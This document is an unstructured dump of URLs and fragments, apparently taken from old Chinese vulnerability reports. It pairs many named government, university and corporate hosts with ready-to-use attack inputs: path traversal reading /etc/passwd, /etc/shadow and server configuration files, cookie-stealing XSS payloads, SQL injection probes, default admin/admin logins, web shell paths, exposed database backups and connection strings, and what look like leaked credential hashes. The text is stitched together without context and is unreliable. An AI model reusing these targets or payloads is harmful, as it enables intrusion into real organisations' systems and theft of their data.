http://www.cits.com.cn/cits/membercenter/password/getpassword.html?sendTime=**********&userValue=**********&userType=ZW1haWw=&submitType=emailResetpws http://mail.comingchina.com/webmail/client/cache/78655/letterpaper_1_thumb.jpg http://mail.comingchina.com/webmail/client/cache/78655/letterpaper_1.jpg http://mail.comingchina.com/webmail/client/cache/78655/letterpaper_1.jpg/.php http://211.64.192.44:8080/servlet/com.runqian.base.util.ReadJavaScriptServlet?file=../../../../../../../conf/resin.conf 
https://202.102.36.209/index.php,由于noscript默认禁止加载此网站的脚本,所以浏览器不会跳转: http://mail.21cn.com/help/freemail/main3.html?url=javascript:alert%28document.cookie%29 data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg== http://mail.21cn.com/help/freemail/main3.html?url=javascript:alert%28document.cookie%29 url:http://58.213.50.110:8081/manager/html user:admin pass:admin http://jgsfzx.hbue.edu.cn/syzx.asp?id=13 http://jgsfzx.hbue.edu.cn/news_show.asp?id=182 http://jgsfzx.hbue.edu.cn/admin/login.asp http://www.nnfcdj.com/phpcms/admin/存在目录遍历。 www.aqcoop.gov.cn/dc_detail.phpid=9 www.aqsb.com.cn/dc_detail.phpid=9注入地址.问题出在投票时的参数vv未过滤,直接导致了注入。 http://www.aqcoop.gov.cn/dc_detail_save.php https://114.255.154.77/por/service.csp?rnd=dkofoomhkfmemja http://zhihui.189hz.com/ http://zhihui.189hz.com/marry/mp_index.action http://124.128.202.203:8899/JYJCWEB/webSpYouxiaoListAction!getList.do http://lexue.yonyou.com http://lexue.yonyou.com/News_1.aspx?newsid=10 http://fw.qqhr.gov.cn/fw_more.php?fw_id=37 http://www.qqhr.gov.cn/login.jsp http://glpt.sxaj.gov.cn/admin/Default.aspx username:admin password:admin http://gotonju.nju.edu.cn/console.do http://122.119.120.18:8180/admin-console/ http://122.119.120.18:8180/umetripcki/umetripcki/login.jsp http://m.umetrip.com/i/a http://122.119.120.18:8180/umetripcki/umetripcki/login.jsp http://ecc.tencent.com/ http://www.xmhcyy.com/disp.action http://www.xmhcyy.com/disp.action?redirect:Http://www.baidu.com http://www.xmhcyy.com/admin/login.jsp http://www.xmhcyy.com/ckfinder/ckfinder.html http://mail.eqsc.gov.cn/ http://ngo.nandu.com/info/detail/id/699 http://mail.zsc.edu.cn/zsc.edu.cn.txt http://mail.zhanjiang.gov.cn/ http://www.zzdtv.cn/ http://www.zzdtv.cn/login.asp http://www.zzdtv.cn/article_view.asp?id=663 http://labs.chinamobile.com/check_login.php?url=http%3A%2F%2Flabs.chinamobile.com%2F http://www.fjtic.com.cn/?app=search http://quote.futures.hexun.com/2010/spotmarket_xml.ashx?breed=Au9999 http://jjc.xjedu.gov.cn 
http://58.213.129.227/Login.aspx http://210.51.19.141/programupload/ http://fresh.haier.com/ http://fresh.haier.com/info/index/9插入评论 https://202.102.36.209/file/db.inf http://hc.csdn.net/ajax/red_num http://www.dl-huawen.com/ www.idcw.com/news/help_detail.asp?Id=406 http://answer.tongyi.com/index.php/question/xxmyask?id=99755 http://moa.scal.com.cn http://moa.scal.com.cn/test/Test1.aspx http://www.jhccb.com.cn/x.txt http://210.42.38.2/zcc/ http://210.42.38.2/zcc/news.php?id=2970 http://www.hbgzw.gov.cn/jsp/mail/browser/View.jsp?id=(参数随机) http://www.hbgzw.gov.cn/jsp/mail/browser/View.jsp?id=51 http://www.hbgzw.gov.cn/jsp/mail/browser/View.jsp?id=52 http://www.hbgzw.gov.cn/jsp/mail/browser/View.jsp?id=53 http://www.hbgzw.gov.cn/jsp/mail/browser/View.jsp?id=54 http://sfj.kyqq.gov.cn/list.aspx?id=50 http://sfj.kyqq.gov.cn/content.aspx?id=261 http://keqz.kyqq.gov.cn/List.aspx?id=65 http://keqz.kyqq.gov.cn/List.aspx?id=65 www.zhangye.gov.cn/Department/public/PublicInfo.aspx?Id=704&DepartmentID=3&NodeID=436 http://cz.zhangye.gov.cn/Department/Public/PublicInfo.aspx?Id=2730&DepartmentID=2&NodeID=435 http://wjj.zhangye.gov.cn/Department/Public/PublicInfo.aspx?Id=2049&DepartmentID=55&NodeID=547 http://aj.zhangye.gov.cn/Department/Public/PublicInfo.aspx?Id=1719&DepartmentID=19&NodeID=545 http://kp.zhangye.gov.cn/Department/Public/PublicInfo.aspx?Id=2848&DepartmentID=42&NodeID=533 http://fzb.zhangye.gov.cn/Department/Public/PublicInfo.aspx?Id=805&DepartmentID=25&NodeID=541 http://www.sciencep.com/s_third_list.php?id=670 http://www.najyj.net/ http://www.najyj.net/09_zxjy/bmgk_index.htm http://najxzjb.30edu.com/ http://prep.shenzhenair.com/ http://prep.airkunming.com/ http://wan.renren.com/dota/bar.html?gameUrl=http://login.taobao.com http://wan.renren.com/csj/bar.html?gameUrl=http://www.baidu.com http://wan.renren.com/dxz/bar.html?gameUrl=http://www.baidu.com http://wan.renren.com/djh/bar.html?gameUrl=http://baidu.com http://wan.renren.com/dpcq/bar.html?gameUrl=http://baidu.com 
http://wan.renren.com/dxz/bar.html?gameUrl=http://baidu.com http://wan.renren.com/l/bar.html?gameUrl=http://baidu.com http://wan.renren.com/lstx/bar.html?gameUrl=http://baidu.com http://wan.renren.com/jzsg/bar.html?gameUrl=http://baidu.com http://wan.renren.com/war/bar.html?gameUrl=http://baidu.com http://wan.renren.com/rrmj/bar.html?gameUrl=http://baidu.com http://wan.renren.com/shenqu/bar.html?gameUrl=http://baidu.com http://wan.renren.com/war/bar.html?gameUrl=http://baidu.com http://wan.renren.com/dxz/bar.html?gameUrl=javascript:alert%28/xss/%29// http://blog.csdn.net/hyy044101331/common/report?id=4192785&t=3&floor=1 http://oa.hzuf.com:9090/assetsReport/assetsDetails.jsp?assetsNo=11 http://gzwnq.88ip.cn:9090/assetsReport/assetsDetails.jsp?assetsNo=11 http://oa.linya.cn:9099/assetsReport/assetsDetails.jsp?assetsNo=11 http://fm.eyesoffice.com:9090/assetsReport/assetsDetails.jsp?assetsNo=11 http://oa.shunhengli.com:9090/assetsReport/assetsDetails.jsp?assetsNo=11 intitle:FE协作办公平台 http://oa.shunhengli.com:9090/carManager/carUseDetailList.jsp?CAR_BRAND_NO=A59C58 intitle:FE协作办公平台5.5 http://oa.hzuf.com:9090/cooperate/flow/loadInforData.jsp?guid=1 intitle:FE协作办公平台5.5 http://oa.shunhengli.com:9090/feform/createprinttemplete.jsp?formid=1 http://www.kingsoft.com/ckplayer/video.php?url=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00 wxy.hqu.edu.cn/hqdx/szll_2.asp?id=140,可扫描出用户账户密码 http://gk.tj.gov.cn/天津市政府信息公开系统 http://zwgk.tjhexi.gov.cn/河西区政府信息公开系统 http://60.29.57.38/和平区政府信息公开系统 http://zwgk.tjhd.gov.cn/河东区政府信息公开系统 http://gk.tjhbq.gov.cn/河北区政府信息公开系统 http://gk.tjnk.gov.cn/南开区政府信息公开系统 http://gk.tjhqqzf.gov.cn/ConInfoParticular.jsp?id=2015 http://gk.tjjh.gov.cn/ConInfoParticular.jsp?id=5367 http://zwgk.tjhd.gov.cn:8000/ConInfoParticular.jsp?id=1909 http://202.99.99.30/ConInfoParticular.jsp?id=2194 http://zfxxgk.bh.gov.cn/ConInfoParticular.jsp?id=7616 http://60.30.65.156/ConInfoParticular.jsp?id=2454 http://xxgk.tjbc.cn/ConInfoParticular.jsp?id=5889 
http://xinxigk.baodi.gov.cn/ConInfoParticular.jsp?id=2357 http://60.28.129.212/ConInfoParticular.jsp?id=10621 http://27.112.1.56/ConInfoParticular.jsp?id=15205 http://www.jzrsrc.gov.cn/onetree.asp http://www.jzrsrc.gov.cn/news/SCNews.mdb http://www.jzrsrc.gov.cn/news/login.asp http://www.xsdrfid.com/fanan_info.asp?ID=8 http://www.infojiading.cn/index.asp http://nps.mychery.com http://ps.beijing-hualian.com/application/application/sxps/order_line_sb.asp?fsuppl_no=21639&fstoregeno=41001&fpsordno=2014130150&fordno=214850 http://www.anquan.org/authenticate/cert/?site=www.cjk3d.net&at=personal http://www.anquan.org/authenticate/cert/?site=www.cjk3d.net&at=official http://www.baidu.com/s?ie=utf-8&wd=inurl%3Ahttp%3A%2F%2Fwww.anquan.org%2Fauthenticate%2Fcert%2F%3Fsite&tn=baiduhome_pg&oq=inurl%3Ahttp%3A%2F%2Fwww.anquan.org%2Fauthenticate%2Fcert%2F%3Fsite&rsv_spt=1&issp=1&rsv_bp=0&pn=0 http://121.12.117.111:9231/v2014-admin/adminv2014admin/admin_user_detail.asp?intUserId=5961 http://au.iqiyi.com/public/ http://au.iqiyi.com/conf/ http://au.iqiyi.com/conf/appconfig.php http://au.iqiyi.com/lib/Service/SecKill/seckill.sql http://au.iqiyi.com/index.php?m=Login&a=login&type= http://220.249.194.22/indexAction.action http://202.199.155.111:8080/pdms/mainPage.action http://www.aydzjc.gov.cn/indexAction.action http://online.wl-expo.com/newscenter/indexAction.action http://www.aunipex.com/IndexAction.action http://ztb.hnwr.gov.cn/module/bidpub/announcement-notice!findByKeyDetail.action http://www.zuzhirenshi.com/GetInfo.action http://121.12.117.111:9231/v2014-admin/adminv2014admin/admin_admin_add_save.asp http://121.12.117.111:9231/v2014-admin/adminv2014admin/admin_admin_add_save.asp?iptAccount=管理员名称&selLevel=1&selStatus=0&iptPassword=管理员密码&iptPassword2=第二遍确认密码&submit=%E6%8F%90+%E4%BA%A4 http://t.cn/RPRNHuB http://www.bjfsjy.com/lanmu_news.asp?lanmu_id=65 http://www.bjfsjy.com/product_cat.asp?catid=106 http://www.bjfsjy.com/product_z.asp?product_id=84 
http://www.bjxtac.com/lanmu_news.asp?lanmu_id=41 http://www.bjxtac.com/product_cat.asp?catid=63 http://www.bjxtac.com/news_z.asp?news_id=220 http://www.bjxtac.com/product_z.asp?product_id=60 http://www.65342222.com/7/lanmu_news.asp?lanmu_id=41 http://www.65342222.com/7/product_z.asp?product_id=58 http://www.hebaoxianlan.com/lanmu_news.asp?lanmu_id=74 http://www.hebaoxianlan.com/product_z.asp?product_id=137 http://www.hebaoxianlan.com/news_z.asp?news_id=162 http://www.hebaoxianlan.com/product_cat.asp?catid=63 http://www.shoukong.net.cn/product_cat.asp?catid=63 http://www.shoukong.net.cn/news_z.asp?news_id=250 http://www.shoukong.net.cn/lanmu_news.asp?lanmu_id=42 http://www.shoukong.net.cn/product_z.asp?product_id=60 http://www.xishantulangzhong.com/lanmu_news.asp?lanmu_id=65 http://www.xishantulangzhong.com/product_z.asp?product_id=84 http://www.xishantulangzhong.com/product_cat.asp?catid=106 http://www.xishantulangzhong.com/news_z.asp?news_id=408 http://gxba.bjfsba.com/news_z.asp?news_id=220 http://gxba.bjfsba.com/lanmu_news.asp?lanmu_id=41 http://gxba.bjfsba.com/product_z.asp?product_id=60 http://gxba.bjfsba.com/product_cat.asp?catid=63 http://www.jgydk.com/lanmu_news.asp?lanmu_id=51 http://www.jgydk.com/news_z.asp?news_id=208 http://www.bjzjgh.com/lanmu_news.asp?lanmu_id=74 http://www.bjzjgh.com/product_cat.asp?catid=63 http://www.bjzjgh.com/product_z.asp?product_id=69 http://www.bjzjgh.com/news_z.asp?news_id=149 http://www.bjshine.cn/product_cat.asp?catid=63 http://www.bjshine.cn/news_z.asp?news_id=175 http://www.hlyc.cn/lanmu_news.asp?lanmu_id=41 http://www.hlyc.cn/product_cat.asp?catid=63 http://www.hlyc.cn/product_z.asp?product_id=156 http://www.hlyc.cn/news_z.asp?news_id=512 www.haohuiyi.com http://vip13.haohuiyi.net)存在struts2漏洞。。直接导致站点getwebshell jdbc:mysql://haohuiyi.mysql.rds.aliyuncs.com:3306/haohuiyio?autoReconnect=true jdbc:mysql://haohuiyi.mysql.rds.aliyuncs.com:3306/haohuiyio?autoReconnect=true http://www.centit.com/ http://www.ldzsc.gov.cn/ 
http://218.92.49.74:8090/ganyunet/ http://218.92.50.139:8082/lygdhnet/ http://218.92.62.78/gnnet/ http://218.92.14.22/gynet/ http://61.132.0.36:8090/lygnet/ http://tcfdc.net:80/bzxzf/bz.aspx?sort=123,你们更专业,我路过看看的。 http://wenming.chinadaily.com.cn/VideoList.aspx?sole=20140113174715584 http://person.huibo.com/register/CheckEmail/ https://58.211.152.245/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00 http://openapi.qzone.qq.com/crossdomain.xml http://wooyun.org/bugs/wooyun-2014-062461 http://给.pw/getqq/ http://ptcms.csdn.net/article/service/article_count?preview=1&aid=2821253&jsonpcallback=jQuery1910565352892735973_1408438433889&_=1408438433890 http://gaj.laixi.gov.cn/view.jsp?id=78002 http://tjj.laixi.gov.cn/view.jsp?id=77219 http://www.12308.com/help/search.sc?searchKey= http://www.hrbcb.com.cn/card/merchant.do?attach=../..//../..//../..//../..//../..//../..//../..//../..//etc/shadow&method=attachDown www.cdce.cn)渗透测试: http://www.fhoaf.gov.cn/admin/admin_login.asp http://math.ytu.edu.cn/math/test/ www.sjzpinfo.net/csbm/zjc/dacx.asp www.sjzpinfo.net/csbm/zjc/dacx.asp http://xgcbysda.gxu.edu.cn/ http://58.192.114.32/setup/search.aspx xsc.jhun.edu.cn/bys/dacx.asp http://xsc.jhun.edu.cn/bys/guanli.asp?name=&pws= http://oa.515158.com http://oa.515158.com/ntko/FileEdit.php?fileType=word&FileId=51515800000&filenumber=514238140820103755&officetype=1&uid=2&date=2014-08-20%2010:37:55 http://oa.515158.com/admin.php?ischeck=&ac=file_read&do=list&fileurl=file&vuidtype=&type=1&number=&title=&vstartdate=&venddate= http://oa.515158.com/admin.php?ischeck=&ac=file_read&do=list&fileurl=file&vuidtype=&type=1&number=&title=&vstartdate=&venddate= http://oa.515158.com/admin.php?ac=department&fileurl=wage&do=log&wid=132 http://oa.515158.com/admin.php?ac=department&fileurl=wage&do=log&wid=132 http://yjsgl.ncu.edu.cn/pub!list.action 
http://www.rasp.gov.cn/was/was/web/wzruian/wssp/checkAcc.jsp?username=a http://www.yjsp.gov.cn/was/was/web/wzyongjia/wssp/checkAcc.jsp?username=a http://122.228.149.62:8787/was/was/web/wzpingyang/wssp/checkAcc.jsp?username=a d.363.com/phpcms/明显phpcms www.363.com官网也在上面 http://wgb.tx100.com/login.action inurl:/BBS/topic.jsp?sectionId= http://qb3z.mhedu.sh.cn/webschool/BBS/topic.jsp?sectionId=ebbs02&boardI http://www.sqlmap.org http://www.yjsp.gov.cn/was/ptlAccount.action http://www.rasp.gov.cn/was/ptlAccount.action http://122.228.149.62:8787/was/ptlAccount.action http://www.wintalent.com/ http://zhaopin.jd.com/ http://talent.baidu.com/ www.hotjob.cn http://zhaopin.jd.com/ http://travel.chinadaily.com.cn/events/eventinfo?e_id= xsd:anyType xsi:type="xsd:string xsd:anyType xsd:anyType xsi:type="xsd:string xsd:anyType xsd:anyType xsi:type="xsd:string xsd:anyType xsd:anyType xsi:type="xsd:string xsd:anyType http://tzb.hebut.edu.cn/list.php?tid=1&type=50tid=1 http://tzb.hebut.edu.cn/tzb_oldweb/xsnews/edit/uploadfile/ku.php http://fao.hebut.edu.cn/xiazai.php?flag=1 http://gy.evergrande.com/ObjectHouseInfo.aspx?ID=13 http://battery.tcl.com/read_news.php?id=38 http://www.imooc.com/code/858 http://php.mukewang.com/858-7566546/wooyun.php http://www.gkj.dl.gov.cn/phpmyadmin/ http://house.szibr.com:8000/src/acloglogin.php http://house.szibr.com:8000/src/sqlclient.php http://segmentfault.com/q/1010000000489007#a-1020000000642886 http://u.sohu.com/downloadfile.action http://goucai.touzhu.cn/actinfo/news_39692.html http://goucai.touzhu.cn/actinfo/news_39692 http://goucai.touzhu.cn/actinfo/news_39692 http://test.wenwen.sogou.com/ http://test.wenwen.sogou.com/cat/ http://test.wenwen.sogou.com/s/manager.action http://test.wenwen.sogou.com/portal/index.jsp http://www.lppz.com/member/emailvalidatesuccess.jsp?userId=u_1 http://www.hlau.cn/un/buchu/baowei/admin/index.php http://shop.vmalltop.com http://shop.admin.vmalltop.com/Login/index http://112.65.141.202/Home/login 
http://www.js165.com/res/admin/ http://www.js165.com/res/admin/list_file.aspx http://nlp.blcu.edu.cn/others/cet/Other/SearchHZ/search.php?page=2&num=10%27%20and%20%27%27=%27&zi= http://nlp.blcu.edu.cn/others/cet/Other/SearchHZ/search.php?page=2&num=10%27%20and%20%271%27=%27&zi= http://nlp.blcu.edu.cn/others/cet/Other/SearchHZ/one.php http://218.61.12.210/ http://www.xmwsrc.com/admin/fckeditor http://www.xmwsrc.com/admin/fckeditor/_samples/default.html http://www.xmwsrc.com/UploadFiles/file/1.asp/asp.jpg http://www.xmwsrc.com/UploadFiles/file/1.cer/hlnjwl.jpg http://jiuye.nwu.edu.cn/login/xx/add.jsp?lx= inurl:/ws2004/ inurl:/vc2003/login/ inurl:Flight/InternationalTicket.asp http://www.tokair.com/ http://www.yichenghk.cn www.yichenghk.cn inurl:Visa/VisaSerchInfo.asp http://222.68.17.232:8080/ http://mail.wugang.gov.cn http://mail.chinaexpressair.com/ http://www.krrj.cn/ http://www.krrj.cn/download/aiov7.exe http://service.wanmei.com/faxservice/toPrint.do?serviceNo=1365171718702 http://service.wanmei.com/faxservice/toPrint.do?serviceNo=1365171718702%27%20and%20%271%27=%271 http://bar.2144.cn/home/message/uid/61054556 http://bar.2144.cn/home/message/uid/61054556 http://map.baidu.com/?newmap=1&shareurl=1&l=13&tn=B_NORMAL_MAP&c=13381480,3510185&s=nav%26navtp%3D2%26c%3D179%26drag%3D1%26sc%3D179%26ec%3D1474%2Bto%3A1474%26sy%3D0%26sn%3D1%24%24%24%2413379315.6%2C3516515.34%24%24%E5%8F%8C%E7%89%9B%E5%A4%A7%E5%8E%A6%24%24%24%24%24%2413379315.6%2C3516515.34%24%24%26en%3D2%24%2450f7d146b1f3dac573210b8c%24%2413389510%2C3504432%24%24 http://map.baidu.com/?newmap=1&shareurl=1&l=13&tn=B_NORMAL_MAP&c=13381480,3510185&s=nav&navtp=2&c=179&drag=1&sc=179&ec=1474+to:1474&sy=0&sn=1$$$$13379315.6,3516515.34$$双牛大厦$$$$$$13379315.6,3516515.34$$&en=2$$50f7d146b1f3dac573210b8c$$13389510,3504432$$ to:1$$$$13373704.98,3516060$$西湖区$$$$$$13373704.98,3516060$$ http://211.82.175.10//admin/FCKeditor/editor/filemanager/upload/test.html http://bbs.51job.com/attachment/upload/76/1408976.jpg 
http://ms.hinews.cn/page-42006.html http://61.156.3.68/Login.aspx http://61.156.3.89:8100/ http://61.156.3.89:8100/ldcp/AdminLogin.asp http://61.156.3.89:8100/fzcp/main.asp http://61.156.3.89:8100/ldcp/main.asp http://61.156.3.89:8100/ygcp/cs3.asp http://61.177.86.27:8080/jmx-console/ http://61.177.86.27:8080/zecmd/zecmd.jsp encap:Ethernet D3:26:08 addr:132.228.36.82 Bcast:132.228.36.95 Mask:255.255.255.240 fed3:2608/64 Scope:Link MTU:1500 packets:1321060332 dropped:1818 packets:358858752 txqueuelen:1000 http://www.xiangtan.gov.cn/comm/jdft/interviewimg/20140821011858461.jsp Google:admin/manager/admin_voting_show.php http://183.238.102.120:8080/vtsidcard/ http://58.248.32.37/Login.aspx http://58.248.32.37/Login.aspx http://t2d.ntalker.com/func/imagetrans/image.php?f=YWFhLnBuZw==&q=L2ltYWdlc2F2ZS90ZW1wL2tmXzk4MTcvZWI5ZmNhZmNlMmYxOTNlNzM2YzBmNjBmMjk1YjgzODAxNDA4NTk4Njc2LnBuZw==","oldfile":"aaa.png","size":"4.36 http://t2d.ntalker.com/func/imagetrans/download.php?f=YWFhLnBuZw==&q=L2ltYWdlc2F2ZS90ZW1wL2tmXzk4MTcvZWI5ZmNhZmNlMmYxOTNlNzM2YzBmNjBmMjk1YjgzODAxNDA4NTk4Njc2LnBuZw== http://xccbank.com/html/ http://xccbank.com/admin.php?mod=phpcms&file=login http://www.xccbank.com:8181/kingpa/library/login.jsp http://www.xccbank.com:8080/kingpa/login.jsp http://xccbank.com/phpmyadmin/ http://xccbank.com/phpinfo.php http://xccbank.com/data/bakup/ http://www.wooyun.org/bugs/wooyun-2014-073346/trace/7b217977d57cfdc8feda573f8d0eb4ee inurl:out.do?viewType= http://www.hrbcdc.com/admin/ file:///etc/passwd xmlns:ve="http://schemas.openxmlformats.org/markup-compatibility/2006 xmlns:o="urn:schemas-microsoft-com:office:office xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math xmlns:v="urn:schemas-microsoft-com:vml xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing xmlns:w10="urn:schemas-microsoft-com:office:word 
xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml inurl:Flight/DomesticTicketTejiaAirport.asp http://www.wugang.gov.cn/jcms/workflow/objectbox/selectx_list.jsp?id=1 http://www.wugang.gov.cn/jis/objectbox/selx_list.jsp?id=1 http://xxgk.nbjiangbei.gov.cn/xxgk/workflow/objectbox/selectx_list.jsp?id=1 http://www.lzcgq.gov.cn/jcms/workflow/sys/que_dictionary.jsp?que_keywords1=aaa http://www.taojiang.gov.cn//jcms/m_5_e/init/sitesearch/opr_classajax.jsp?classid=1 http://www.wugang.gov.cn/jcms/m_5_5/m_5_5_1/que_flow.jsp?que_keywords1=aaa http://management.ysx.gov.cn/jis/manage/datasbase/closeup.jsp?id=1 http://management.ysx.gov.cn/jis/manage/datasbase/startup.jsp?id=1 http://www.wugang.gov.cn/jcms/m_5_3/attach/que_attach_choose.jsp?classid=-1&que_keywords1=1 http://www.wugang.gov.cn/jcms/m_5_3/attach/que_attach_choose.jsp?classid=-1&que_keywords1=1 http://www.sheshantravel.com/jcms/workflow/objectbox/selectx_czuserlist.jsp?appid=1&flowcode=2&nodecode=3&handlerid=4 http://www.sheshantravel.com/jcms/workflow/objectbox/selectx_czuserlist.jsp?appid=1&flowcode=2&nodecode=3&handlerid=4 http://www.czjj.gov.cn/jcms/m_5_e/module/messagebook/opr_messagebook_column.jsp?fn_billstatus=D&i_ID=1 http://sha.sinotrans.com/jcms/m_5_e/init/download/downfile.jsp?filename=1 https://www.jssy.cn/portal/index.jsp http://dfi.bnuz.edu.cn/college/news.php?newsid=4” www.fx678.com/charge/free_charge_newlist.asp?pointid=453 http://www.165xj.com/install/ http://demo.magicwinmail.com:6080 http://bbs.e23.cn/ http://118.186.245.5:9084/TzxMember/member.jsp http://221.10.252.24:8081/default.asp http://221.10.252.24:8081/ http://221.10.252.24:8081/mps/ inurl:/ws2004/ inurl:/vc2003/login/ http://democn.mall-builder.com http://democn.mall-builder.com/product-detail-521.html http://mse.hebut.edu.cn/e/master/login.aspx http://mob.118114.cn http://mob.118114.cn/MenuTree.aspx?permissionid=120001 http://59.151.42.145/admin/ 
http://count.hjsm.tom.com/ http://game.tom.com/tomqp/index.php http://post.tom.com/qa/env.php http://slides.discovery.tom.com/info.php http://sales.vip.tom.com/net1hao/phpinfo.php http://search.weiqi.sports.tom.com/%3f.jsp http://auto.tom.com/cx/ sales.vip.tom.com/php http://www.lfxy.gov.cn/xyb/credit/queryGoodRecordDetail.action http://download.csdn.net/download/shuaimengxia/7037337 http://blog.csdn.net/yfbaini/article/details/38745503 http://e.kesion.com http://e.kesion.com/user/course/MyCourseOrder.aspx,我的订单,3个框框都无过滤,可注入: http://www.weekedu.com/ http://www.weekedu.com/user/MobileBind.aspx http://域名(ip)/xsxjxtdl.aspx http://autosite.idcs.cn/webmall/query.php?catid=%27%29 intitle:TopOffice协同办公系统 http://51talk.com:8080/mon/mem/memadmin/index.php?action=set.con http://wap.js.10086.cn/mall/mall/activity.do?pageCont=order_detail&orderid=011012073020150 http://jk.xd.com/ http://w.k189.cn/index.php/Wap/WBind/isZjTelecom http://189.tyquan.cn//BDServlet http://oice.hbu.edu.cn/data.asp http://www.nyzsb.com.cn/show_news.php?id=439“ http://qqhx.qq.com/cp/a20131014hxlighten/### http://www.hlca.gov.cn/3g_news_list.php?cid=14&gid=15 http://www.hlca.gov.cn/new.php?cid=4 http://www.hlca.gov.cn/newsshow.php?cid=4&id=1018 http://ce.wooyun.org/ http://ce.wooyun.org/index.php?do=login&act=logout http://preview.mail.189.cn:8081/ http://preview.mail.189.cn:8081/resin-doc/examples/security-basic/viewfile?file=WEB-INF/web.xml pince:Txpd1jQc/xwhISIqodEjfw==:staff,website filch:KmZIq2RKXAHV4BaoNHfupQ==:staff http://preview.mail.189.cn:8081/resin-doc/examples/security-basic/viewfile?file=index.jsp http://java.sun.com/jsp/jstl/core http://wooyun.org/bugs/wooyun-2014-058757 http://220.169.236.108:8044 http://zzb.taicang.gov.cn/ http://zzb.taicang.gov.cn/test.txt http://192.168.1.102:8080/365SERVICE/userfiles/ jdbc:oracle:thin:@127.0.0.1:1521:ORCL http://news1.hbcf.edu.cn/gjjy/new.php?id=1017&typeid=0&borderid=0” http://klpr.ibcas.ac.cn/admin/login.asp http://demo.magicwinmail.com:6080 
http://comment.chinadaily.com.cn/sp_comments.shtml?cid=3-1-109 http://218.206.24.135:81/iot/download?fn=../../../../../etc/passwd http://www.zgc-ft.gov.cn/ http://www.zgc-ft.gov.cn/cms/webapp/column.jsp?ColumnID=53 http://210.21.5.9/ http://210.21.5.9/files/ http://app.finance.ifeng.com/finance/fundhtml/indexpj.php?pj_type=CHENXING&fund_type=gp&orderby=jjdm&ordertype=desc file:///etc/passwd xmlns:ve="http://schemas.openxmlformats.org/markup-compatibility/2006 xmlns:o="urn:schemas-microsoft-com:office:office xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math xmlns:v="urn:schemas-microsoft-com:vml xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing xmlns:w10="urn:schemas-microsoft-com:office:word xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml http://convention.mcdonalds.com.cn/cn/login.aspx http://democn.mall-builder.com http://democn.mall-builder.com/main.php?m=product&s=admin_orderdetail&id=201408221129296 http://democn.mall-builder.com/api/order.php?id=201408221129296&type=预存款支付&order_id=201408221129296&price=598&extra_param=&statu=1&auth=27a2824875956f6d6e268a992ad3f8c4 http://democn.mall-builder.com/pay/ http://www.sxdt.gov.cn:8080/ http://www.hnzwgk.gov.cn/list.php?code=003051081&groupcode=020600 http://xxgk.jiuhuashan.gov.cn/list.php?code=RF001 http://www.xinnet.com/online/shopcart.do?method=updateShopCart&purchaseYears=%202&timeUnit=Y&uuid=D0D9BA74BA0A48CDA6DC22E0A5A12227&selectType=a http://srs.zhaopin.com/login.action https://www.greeninhand.com/product.php?CateID=6 https://www.greeninhand.com/product.php?CateID=6&ProductID=177&Page=0 http://jiuye.nwu.edu.cn/detail.jsp?id=2886 http://220.160.119.31:81/tabid/289/Default.aspx http://220.160.119.31:81/tabid/289/Default.aspx labs.chinamobile.com/admin/help.php.bak 
http://szgy.sxjs.gov.cn/new/Manage/Login.aspx http://211.103.186.177/ http://211.103.186.177/doLogin.do http://211.103.186.178/ https://app.xmhrss.gov.cn/wcm/servlet/MedicareDrugsServlet?ypmc00=h&sfybxm=Y&x=25&y=10 http://www.coop.ln.gov.cn/xw_info.asp?id=4835 http://www.coop.ln.gov.cn/xw_info.asp?id=4835 http://www.coop.ln.gov.cn/xw_info.asp?id=4835 http://58.42.247.98/soa http://60.166.52.178:9090/soa/portal/indexAC.do http://183.62.9.141/soa http://210.73.45.131/soa http://120.69.82.99/soa http://202.109.244.119/soa/portal/indexAC.do http://219.148.61.8:8000/soa/portal/indexAC.do http://58.213.145.73/soa/portal/indexAC.do http://202.127.12.27/soa/portal/indexAC.do http://soa.ip.gov.cn/soa/portal/indexAC.do http://pa.nbipo.gov.cn/soa http://123.157.156.200/soa http://202.99.194.152:9000/soa/portal/indexAC.do http://61.178.21.182/soa http://222.240.166.58:8001/soa http://139.210.164.131/soa http://124.133.35.226:5780/soa http://www.fxxt.nxipo.gov.cn http://27.223.28.115:81/soa http://218.57.139.5/soa/portal/indexAC.do http://222.34.136.72/soa/portal/indexAC.do http://202.108.243.221/soa http://218.60.146.232/soa/ http://fx.hlipo.gov.cn/soa http://61.138.98.215/soa http://116.66.35.202/soa/portal/indexAC.do http://60.28.62.184/soa http://59.46.163.22/soa/portal/indexAC.do http://218.61.146.44/soa/portal/indexAC.do http://218.70.88.213/soa/ http://218.77.186.204/soa/portal/indexAC.do http://220.249.102.17/soa http://118.112.188.132/soa/ http://onan.gxstd.com/soa/portal/indexAC.do http://219.140.56.154 http://61.157.78.21/soa/portal/indexAC.do# http://www.fjipo.gov.cn:81/soa/ http://211.142.200.86/soa www.56xj.net http://ttc.njnu.edu.cn/web.rar http://spzx.njnu.edu.cn/web.rar http://gpjh.njnu.edu.cn/web.rar http://xtoa.lbex.com.cn/Default.aspx http://jyx.ndnu.edu.cn/index.html http://221.194.128.113:8095/BdlbsManager/ jdbc:oracle:thin:@10.0.18.42:1521:bddb jdbc:oracle:thin:@221.194.128.113:1538:bddb jdbc:oracle:thin:@221.194.128.114:1539:ykdb 
